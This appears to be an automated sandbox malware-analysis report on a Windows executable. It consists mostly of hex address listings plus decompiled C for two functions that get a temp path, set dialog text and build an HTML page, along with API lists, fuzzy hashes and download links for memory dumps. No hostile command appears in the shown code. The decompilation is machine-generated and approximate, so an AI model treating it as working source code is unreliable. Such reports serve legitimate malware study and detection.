                                                                                                                                                    0x0122c0b7
                                                                                                                                                    0x0122c0ba
                                                                                                                                                    0x0122c0bc
                                                                                                                                                    0x0122c0bd
                                                                                                                                                    0x0122c0c0
                                                                                                                                                    0x0122c0e9
                                                                                                                                                    0x0122c0e9
                                                                                                                                                    0x0122c0ec
                                                                                                                                                    0x0122c1d1
                                                                                                                                                    0x0122c1da
                                                                                                                                                    0x0122c1df
                                                                                                                                                    0x0122c1df
                                                                                                                                                    0x0122c1e1
                                                                                                                                                    0x0122c1e1
                                                                                                                                                    0x0122c1e3
                                                                                                                                                    0x0122c1e5
                                                                                                                                                    0x0122c1ec
                                                                                                                                                    0x0122c1f1
                                                                                                                                                    0x0122c1f2
                                                                                                                                                    0x0122c1f3
                                                                                                                                                    0x0122c1f5
                                                                                                                                                    0x0122c1f7
                                                                                                                                                    0x0122c1fb
                                                                                                                                                    0x0122c1fd
                                                                                                                                                    0x0122c1fd
                                                                                                                                                    0x0122c1ff
                                                                                                                                                    0x0122c1ff
                                                                                                                                                    0x0122c1fb
                                                                                                                                                    0x0122c203
                                                                                                                                                    0x0122c209
                                                                                                                                                    0x0122c216
                                                                                                                                                    0x0122c21d
                                                                                                                                                    0x0122c22d
                                                                                                                                                    0x0122c237
                                                                                                                                                    0x0122c245
                                                                                                                                                    0x0122c24b
                                                                                                                                                    0x0122c253
                                                                                                                                                    0x0122c258
                                                                                                                                                    0x0122c259
                                                                                                                                                    0x0122c25a
                                                                                                                                                    0x0122c25c
                                                                                                                                                    0x0122c270
                                                                                                                                                    0x0122c270
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c25c
                                                                                                                                                    0x0122c0f2
                                                                                                                                                    0x0122c0f2
                                                                                                                                                    0x0122c0f5
                                                                                                                                                    0x0122c102
                                                                                                                                                    0x0122c102
                                                                                                                                                    0x0122c105
                                                                                                                                                    0x0122c115
                                                                                                                                                    0x0122c11b
                                                                                                                                                    0x0122c11d
                                                                                                                                                    0x0122c11f
                                                                                                                                                    0x0122c122
                                                                                                                                                    0x0122c131
                                                                                                                                                    0x0122c13e
                                                                                                                                                    0x0122c147
                                                                                                                                                    0x0122c14d
                                                                                                                                                    0x0122c150
                                                                                                                                                    0x0122c155
                                                                                                                                                    0x0122c157
                                                                                                                                                    0x0122c159
                                                                                                                                                    0x0122c15b
                                                                                                                                                    0x0122c15b
                                                                                                                                                    0x0122c15d
                                                                                                                                                    0x0122c15d
                                                                                                                                                    0x0122c15f
                                                                                                                                                    0x0122c15f
                                                                                                                                                    0x0122c167
                                                                                                                                                    0x0122c16e
                                                                                                                                                    0x0122c170
                                                                                                                                                    0x0122c177
                                                                                                                                                    0x0122c17d
                                                                                                                                                    0x0122c17f
                                                                                                                                                    0x0122c180
                                                                                                                                                    0x0122c188
                                                                                                                                                    0x0122c197
                                                                                                                                                    0x0122c197
                                                                                                                                                    0x0122c188
                                                                                                                                                    0x0122c1a2
                                                                                                                                                    0x0122c1a4
                                                                                                                                                    0x0122c1b3
                                                                                                                                                    0x0122c1b9
                                                                                                                                                    0x0122c1bf
                                                                                                                                                    0x0122c1ca
                                                                                                                                                    0x0122c1ca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c1bf
                                                                                                                                                    0x0122c0f7
                                                                                                                                                    0x0122c0f7
                                                                                                                                                    0x0122c0fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c0fc
                                                                                                                                                    0x0122c0c2
                                                                                                                                                    0x0122c0c2
                                                                                                                                                    0x0122c0c6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c0c8
                                                                                                                                                    0x0122c0c8
                                                                                                                                                    0x0122c0cb
                                                                                                                                                    0x0122c0cd
                                                                                                                                                    0x0122c0d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c0d6
                                                                                                                                                    0x0122c0df
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c0df
                                                                                                                                                    0x0122c0d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c27b
                                                                                                                                                    0x0122c27b
                                                                                                                                                    0x0122c27c
                                                                                                                                                    0x0122c281
                                                                                                                                                    0x0122c283
                                                                                                                                                    0x0122c286
                                                                                                                                                    0x0122c286
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c2bc
                                                                                                                                                    0x0122c2bc
                                                                                                                                                    0x0122c2c3
                                                                                                                                                    0x0122c2c5
                                                                                                                                                    0x0122c2c5
                                                                                                                                                    0x0122c2c7
                                                                                                                                                    0x0122c2f6
                                                                                                                                                    0x0122c2f6
                                                                                                                                                    0x0122c2fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c2fc
                                                                                                                                                    0x0122c2c9
                                                                                                                                                    0x0122c2c9
                                                                                                                                                    0x0122c2c9
                                                                                                                                                    0x0122c2cc
                                                                                                                                                    0x0122c2e5
                                                                                                                                                    0x0122c2e5
                                                                                                                                                    0x0122c2eb
                                                                                                                                                    0x0122c2eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c2eb
                                                                                                                                                    0x0122c2ce
                                                                                                                                                    0x0122c2ce
                                                                                                                                                    0x0122c2ce
                                                                                                                                                    0x0122c2d1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c2d3
                                                                                                                                                    0x0122c2d3
                                                                                                                                                    0x0122c2d3
                                                                                                                                                    0x0122c2d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c2dc
                                                                                                                                                    0x0122c2dc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c349
                                                                                                                                                    0x0122c349
                                                                                                                                                    0x0122c34c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c34e
                                                                                                                                                    0x0122c34e
                                                                                                                                                    0x0122c35a
                                                                                                                                                    0x0122c35f
                                                                                                                                                    0x0122c360
                                                                                                                                                    0x0122c361
                                                                                                                                                    0x0122c363
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c365
                                                                                                                                                    0x0122c365
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c557
                                                                                                                                                    0x0122c557
                                                                                                                                                    0x0122c55a
                                                                                                                                                    0x0122c55c
                                                                                                                                                    0x0122c563
                                                                                                                                                    0x0122c565
                                                                                                                                                    0x0122c56b
                                                                                                                                                    0x0122c56c
                                                                                                                                                    0x0122c571
                                                                                                                                                    0x0122c572
                                                                                                                                                    0x0122c572
                                                                                                                                                    0x0122c577
                                                                                                                                                    0x0122c57a
                                                                                                                                                    0x0122c580
                                                                                                                                                    0x0122c580
                                                                                                                                                    0x0122c585
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c591
                                                                                                                                                    0x0122c591
                                                                                                                                                    0x0122c594
                                                                                                                                                    0x0122c375
                                                                                                                                                    0x0122c375
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c375
                                                                                                                                                    0x0122c59a
                                                                                                                                                    0x0122c59a
                                                                                                                                                    0x0122c366
                                                                                                                                                    0x0122c366
                                                                                                                                                    0x0122c36c
                                                                                                                                                    0x0122c36d
                                                                                                                                                    0x0122c370
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c5a1
                                                                                                                                                    0x0122c5a1
                                                                                                                                                    0x0122c5a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c5aa
                                                                                                                                                    0x0122c5aa
                                                                                                                                                    0x0122c5ac
                                                                                                                                                    0x0122c5b3
                                                                                                                                                    0x0122c5bb
                                                                                                                                                    0x0122c5c1
                                                                                                                                                    0x0122c5c6
                                                                                                                                                    0x0122c5c9
                                                                                                                                                    0x0122c5fe
                                                                                                                                                    0x0122c603
                                                                                                                                                    0x0122c609
                                                                                                                                                    0x0122c60a
                                                                                                                                                    0x0122c60f
                                                                                                                                                    0x0122c5cb
                                                                                                                                                    0x0122c5cb
                                                                                                                                                    0x0122c5ce
                                                                                                                                                    0x0122c5d4
                                                                                                                                                    0x0122c5ea
                                                                                                                                                    0x0122c5ef
                                                                                                                                                    0x0122c5f0
                                                                                                                                                    0x0122c5f5
                                                                                                                                                    0x0122c5d6
                                                                                                                                                    0x0122c5d6
                                                                                                                                                    0x0122c5db
                                                                                                                                                    0x0122c5dc
                                                                                                                                                    0x0122c5e1
                                                                                                                                                    0x0122c5e1
                                                                                                                                                    0x0122c5d4
                                                                                                                                                    0x0122c616
                                                                                                                                                    0x0122c618
                                                                                                                                                    0x0122c61f
                                                                                                                                                    0x0122c62d
                                                                                                                                                    0x0122c634
                                                                                                                                                    0x0122c639
                                                                                                                                                    0x0122c63a
                                                                                                                                                    0x0122c63b
                                                                                                                                                    0x0122c63d
                                                                                                                                                    0x0122c63e
                                                                                                                                                    0x0122c645
                                                                                                                                                    0x0122c68e
                                                                                                                                                    0x0122c695
                                                                                                                                                    0x0122c69a
                                                                                                                                                    0x0122c69c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c6a2
                                                                                                                                                    0x0122c6a2
                                                                                                                                                    0x0122c6a4
                                                                                                                                                    0x0122c6aa
                                                                                                                                                    0x0122c6b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c6b3
                                                                                                                                                    0x0122c6b3
                                                                                                                                                    0x0122c6b5
                                                                                                                                                    0x0122c6b6
                                                                                                                                                    0x0122c6b6
                                                                                                                                                    0x0122c6b6
                                                                                                                                                    0x0122c6b9
                                                                                                                                                    0x0122c6bc
                                                                                                                                                    0x0122c6c6
                                                                                                                                                    0x0122c6c6
                                                                                                                                                    0x0122c6c8
                                                                                                                                                    0x0122c6ca
                                                                                                                                                    0x0122c6d4
                                                                                                                                                    0x0122c6d9
                                                                                                                                                    0x0122c6db
                                                                                                                                                    0x0122c719
                                                                                                                                                    0x0122c719
                                                                                                                                                    0x0122c71c
                                                                                                                                                    0x0122c71c
                                                                                                                                                    0x0122c71e
                                                                                                                                                    0x0122c71f
                                                                                                                                                    0x0122c71f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c71f
                                                                                                                                                    0x0122c6dd
                                                                                                                                                    0x0122c6dd
                                                                                                                                                    0x0122c6df
                                                                                                                                                    0x0122c6e0
                                                                                                                                                    0x0122c6e2
                                                                                                                                                    0x0122c6e5
                                                                                                                                                    0x0122c6fa
                                                                                                                                                    0x0122c6fa
                                                                                                                                                    0x0122c6fc
                                                                                                                                                    0x0122c6fd
                                                                                                                                                    0x0122c6fd
                                                                                                                                                    0x0122c6fd
                                                                                                                                                    0x0122c700
                                                                                                                                                    0x0122c700
                                                                                                                                                    0x0122c705
                                                                                                                                                    0x0122c706
                                                                                                                                                    0x0122c70c
                                                                                                                                                    0x0122c70c
                                                                                                                                                    0x0122c70d
                                                                                                                                                    0x0122c712
                                                                                                                                                    0x0122c713
                                                                                                                                                    0x0122c714
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c714
                                                                                                                                                    0x0122c6e7
                                                                                                                                                    0x0122c6e7
                                                                                                                                                    0x0122c6ee
                                                                                                                                                    0x0122c6f1
                                                                                                                                                    0x0122c6f2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c6f2
                                                                                                                                                    0x0122c6be
                                                                                                                                                    0x0122c6be
                                                                                                                                                    0x0122c6c0
                                                                                                                                                    0x0122c6c1
                                                                                                                                                    0x0122c6c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c721
                                                                                                                                                    0x0122c721
                                                                                                                                                    0x0122c724
                                                                                                                                                    0x0122c724
                                                                                                                                                    0x0122c729
                                                                                                                                                    0x0122c72b
                                                                                                                                                    0x0122c72d
                                                                                                                                                    0x0122c72d
                                                                                                                                                    0x0122c72f
                                                                                                                                                    0x0122c72f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c647
                                                                                                                                                    0x0122c647
                                                                                                                                                    0x0122c64e
                                                                                                                                                    0x0122c65a
                                                                                                                                                    0x0122c660
                                                                                                                                                    0x0122c661
                                                                                                                                                    0x0122c662
                                                                                                                                                    0x0122c667
                                                                                                                                                    0x0122c66a
                                                                                                                                                    0x0122c66c
                                                                                                                                                    0x0122c672
                                                                                                                                                    0x0122c674
                                                                                                                                                    0x0122c682
                                                                                                                                                    0x0122c687
                                                                                                                                                    0x0122c688
                                                                                                                                                    0x0122c688
                                                                                                                                                    0x0122c732
                                                                                                                                                    0x0122c732
                                                                                                                                                    0x0122c73a
                                                                                                                                                    0x0122c73f
                                                                                                                                                    0x0122c749
                                                                                                                                                    0x0122c750
                                                                                                                                                    0x0122c750
                                                                                                                                                    0x0122c75d
                                                                                                                                                    0x0122c764
                                                                                                                                                    0x0122c769
                                                                                                                                                    0x0122c771
                                                                                                                                                    0x0122c77d
                                                                                                                                                    0x0122c77d
                                                                                                                                                    0x0122c78a
                                                                                                                                                    0x0122c78f
                                                                                                                                                    0x0122c797
                                                                                                                                                    0x0122c7a1
                                                                                                                                                    0x0122c7ae
                                                                                                                                                    0x0122c7b5
                                                                                                                                                    0x0122c7b5
                                                                                                                                                    0x0122c7c1
                                                                                                                                                    0x0122c7c8
                                                                                                                                                    0x0122c7cd
                                                                                                                                                    0x0122c7d5
                                                                                                                                                    0x0122c7db
                                                                                                                                                    0x0122c7dc
                                                                                                                                                    0x0122c7dd
                                                                                                                                                    0x0122c7df
                                                                                                                                                    0x0122c7df
                                                                                                                                                    0x0122c7f4
                                                                                                                                                    0x0122c7f9
                                                                                                                                                    0x0122c805
                                                                                                                                                    0x0122c807
                                                                                                                                                    0x0122c818
                                                                                                                                                    0x0122c825
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c809
                                                                                                                                                    0x0122c809
                                                                                                                                                    0x0122c814
                                                                                                                                                    0x0122c816
                                                                                                                                                    0x0122c82a
                                                                                                                                                    0x0122c82a
                                                                                                                                                    0x0122c82c
                                                                                                                                                    0x0122c832
                                                                                                                                                    0x0122c838
                                                                                                                                                    0x0122c846
                                                                                                                                                    0x0122c84b
                                                                                                                                                    0x0122c84c
                                                                                                                                                    0x0122c854
                                                                                                                                                    0x0122c859
                                                                                                                                                    0x0122c860
                                                                                                                                                    0x0122c866
                                                                                                                                                    0x0122c868
                                                                                                                                                    0x0122c86e
                                                                                                                                                    0x0122c874
                                                                                                                                                    0x0122c876
                                                                                                                                                    0x0122c87f
                                                                                                                                                    0x0122c882
                                                                                                                                                    0x0122c884
                                                                                                                                                    0x0122c88d
                                                                                                                                                    0x0122c890
                                                                                                                                                    0x0122c896
                                                                                                                                                    0x0122c899
                                                                                                                                                    0x0122c8a2
                                                                                                                                                    0x0122c8b1
                                                                                                                                                    0x0122c8b6
                                                                                                                                                    0x0122c8be
                                                                                                                                                    0x0122c8c0
                                                                                                                                                    0x0122c8c1
                                                                                                                                                    0x0122c8c7
                                                                                                                                                    0x0122c8c8
                                                                                                                                                    0x0122c8ca
                                                                                                                                                    0x0122c8cf
                                                                                                                                                    0x0122c8cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c8be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c816
                                                                                                                                                    0x0122c807
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c8d7
                                                                                                                                                    0x0122c8d7
                                                                                                                                                    0x0122c8da
                                                                                                                                                    0x0122c8dc
                                                                                                                                                    0x0122c8dc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c308
                                                                                                                                                    0x0122c308
                                                                                                                                                    0x0122c310
                                                                                                                                                    0x0122c316
                                                                                                                                                    0x0122c319
                                                                                                                                                    0x0122c33d
                                                                                                                                                    0x0122c31b
                                                                                                                                                    0x0122c31b
                                                                                                                                                    0x0122c31e
                                                                                                                                                    0x0122c331
                                                                                                                                                    0x0122c320
                                                                                                                                                    0x0122c320
                                                                                                                                                    0x0122c322
                                                                                                                                                    0x0122c327
                                                                                                                                                    0x0122c327
                                                                                                                                                    0x0122c31e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c381
                                                                                                                                                    0x0122c381
                                                                                                                                                    0x0122c382
                                                                                                                                                    0x0122c387
                                                                                                                                                    0x0122c387
                                                                                                                                                    0x0122c387
                                                                                                                                                    0x0122c38a
                                                                                                                                                    0x0122c38f
                                                                                                                                                    0x0122c395
                                                                                                                                                    0x0122c395
                                                                                                                                                    0x0122c39b
                                                                                                                                                    0x0122c3a1
                                                                                                                                                    0x0122c3a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bd98
                                                                                                                                                    0x0122bd9a
                                                                                                                                                    0x0122bd9f
                                                                                                                                                    0x0122bda5
                                                                                                                                                    0x0122bda8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdaa
                                                                                                                                                    0x0122bdaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdaa
                                                                                                                                                    0x0122bda8
                                                                                                                                                    0x0122c914
                                                                                                                                                    0x0122c91a
                                                                                                                                                    0x0122c924
                                                                                                                                                    0x0122c924
                                                                                                                                                    0x0122c429
                                                                                                                                                    0x0122c429
                                                                                                                                                    0x0122c430
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c436
                                                                                                                                                    0x0122c436
                                                                                                                                                    0x0122c438
                                                                                                                                                    0x0122c43f
                                                                                                                                                    0x0122c447
                                                                                                                                                    0x0122c448
                                                                                                                                                    0x0122c44d
                                                                                                                                                    0x0122c44e
                                                                                                                                                    0x0122c44f
                                                                                                                                                    0x0122c451
                                                                                                                                                    0x0122c4a5
                                                                                                                                                    0x0122c4a5
                                                                                                                                                    0x0122c4ad
                                                                                                                                                    0x0122c4bb
                                                                                                                                                    0x0122c4cc
                                                                                                                                                    0x0122c4da
                                                                                                                                                    0x0122c4da
                                                                                                                                                    0x0122c4e6
                                                                                                                                                    0x0122c4eb
                                                                                                                                                    0x0122c4ed
                                                                                                                                                    0x0122c4fd
                                                                                                                                                    0x0122c507
                                                                                                                                                    0x0122c50c
                                                                                                                                                    0x0122c50f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c515
                                                                                                                                                    0x0122c515
                                                                                                                                                    0x0122c51a
                                                                                                                                                    0x0122c51a
                                                                                                                                                    0x0122c51c
                                                                                                                                                    0x0122c523
                                                                                                                                                    0x0122c529
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c529
                                                                                                                                                    0x0122c50f
                                                                                                                                                    0x0122c453
                                                                                                                                                    0x0122c455
                                                                                                                                                    0x0122c457
                                                                                                                                                    0x0122c45e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c460
                                                                                                                                                    0x0122c460
                                                                                                                                                    0x0122c462
                                                                                                                                                    0x0122c468
                                                                                                                                                    0x0122c468
                                                                                                                                                    0x0122c468
                                                                                                                                                    0x0122c46c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c46e
                                                                                                                                                    0x0122c46e
                                                                                                                                                    0x0122c46f
                                                                                                                                                    0x0122c475
                                                                                                                                                    0x0122c478
                                                                                                                                                    0x0122c47a
                                                                                                                                                    0x0122c47d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c47f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c47f
                                                                                                                                                    0x0122c481
                                                                                                                                                    0x0122c48c
                                                                                                                                                    0x0122c496
                                                                                                                                                    0x0122c49b
                                                                                                                                                    0x0122c49b
                                                                                                                                                    0x0122c49d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c52f
                                                                                                                                                    0x0122c52f
                                                                                                                                                    0x0122c532
                                                                                                                                                    0x0122c538
                                                                                                                                                    0x0122c53f
                                                                                                                                                    0x0122c541
                                                                                                                                                    0x0122c541
                                                                                                                                                    0x0122c54b
                                                                                                                                                    0x0122c54b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c532

                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0122C3C1
                                                                                                                                                    • _swprintf.LIBCMT ref: 0122C3F5
                                                                                                                                                      • Part of subcall function 01213FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01213FE9
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,0125846A), ref: 0122C415
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0122C448
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0122C529
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                                                                    • String ID: %s%s%u
                                                                                                                                                    • API String ID: 2892007947-1360425832
                                                                                                                                                    • Opcode ID: 5e5c1afa8083151c524f2592334e81a5e47b5e5bcc3ba13f053c29e90f9b23c4
                                                                                                                                                    • Instruction ID: d0e0b83dd65281087843091ea7268533d88a621d19528dc329de38baeca3ef17
                                                                                                                                                    • Opcode Fuzzy Hash: 5e5c1afa8083151c524f2592334e81a5e47b5e5bcc3ba13f053c29e90f9b23c4
                                                                                                                                                    • Instruction Fuzzy Hash: 3541967192022ABEEF25DF64DD84EEE77BCEB04314F4040A6FA08E6044EB709A94CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01228DB2, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E01228DB2(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E01228C5A(_t62);
				_push(0x200 + E012333F3(_t62) * 2);
				_t24 = E01233413(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E01235646(_t66, L"<html>");
				E01236FAD(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E01236FAD(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E0122172A(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E01236FAD(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E01236FAD(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E01228FF5(_t60, _t82);
					}
					_t72 = 9 + E012333F3(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L0123340E(_t66);
					_t24 =  *0x1271178(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E01228C91( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0x1242260(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}


















                                                                                                                                                    0x01228db2
                                                                                                                                                    0x01228db2
                                                                                                                                                    0x01228db6
                                                                                                                                                    0x01228dbc
                                                                                                                                                    0x01228f03
                                                                                                                                                    0x01228f03
                                                                                                                                                    0x01228dc2
                                                                                                                                                    0x01228dc9
                                                                                                                                                    0x01228dd4
                                                                                                                                                    0x01228de4
                                                                                                                                                    0x01228de5
                                                                                                                                                    0x01228dea
                                                                                                                                                    0x01228df0
                                                                                                                                                    0x01228efd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01228efe
                                                                                                                                                    0x01228dfd
                                                                                                                                                    0x01228e08
                                                                                                                                                    0x01228e13
                                                                                                                                                    0x01228e18
                                                                                                                                                    0x01228e1b
                                                                                                                                                    0x01228e1f
                                                                                                                                                    0x01228e23
                                                                                                                                                    0x01228e2e
                                                                                                                                                    0x01228e36
                                                                                                                                                    0x01228e3d
                                                                                                                                                    0x01228e3f
                                                                                                                                                    0x01228e41
                                                                                                                                                    0x01228e45
                                                                                                                                                    0x01228e47
                                                                                                                                                    0x01228e47
                                                                                                                                                    0x01228e4c
                                                                                                                                                    0x01228e58
                                                                                                                                                    0x01228e60
                                                                                                                                                    0x01228e66
                                                                                                                                                    0x01228e67
                                                                                                                                                    0x01228e6c
                                                                                                                                                    0x01228e6e
                                                                                                                                                    0x01228e76
                                                                                                                                                    0x01228e76
                                                                                                                                                    0x01228e82
                                                                                                                                                    0x01228e8e
                                                                                                                                                    0x01228e92
                                                                                                                                                    0x01228e9c
                                                                                                                                                    0x01228eb1
                                                                                                                                                    0x01228ebe
                                                                                                                                                    0x01228eb3
                                                                                                                                                    0x01228eb3
                                                                                                                                                    0x01228eb8
                                                                                                                                                    0x01228eb8
                                                                                                                                                    0x01228eb1
                                                                                                                                                    0x01228ec2
                                                                                                                                                    0x01228ed0
                                                                                                                                                    0x01228ed9
                                                                                                                                                    0x01228ee4
                                                                                                                                                    0x01228ee9
                                                                                                                                                    0x01228ef5
                                                                                                                                                    0x01228efb
                                                                                                                                                    0x01228efb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01228e25
                                                                                                                                                    0x01228e25
                                                                                                                                                    0x01228e25
                                                                                                                                                    0x01228e28
                                                                                                                                                    0x01228e28
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 01228E88
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 01228EA9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocByteCharGlobalMultiWide
                                                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                    • API String ID: 3286310052-4209811716
                                                                                                                                                    • Opcode ID: ab4afda2ab0a4f8392d918e1bea0d6e6ac9efc53813b1579cff22ffab92bda6e
                                                                                                                                                    • Instruction ID: 6427b39f6e2ff10152619067a4ff9280d2bfdef0e6e009e3a8c7f7befa22fba8
                                                                                                                                                    • Opcode Fuzzy Hash: ab4afda2ab0a4f8392d918e1bea0d6e6ac9efc53813b1579cff22ffab92bda6e
                                                                                                                                                    • Instruction Fuzzy Hash: 8D3126765243237BE725AB24AC06FBF7BD8EFA5720F00041DFA0196180EF74D60987A6
                                                                                                                                                    Uniqueness

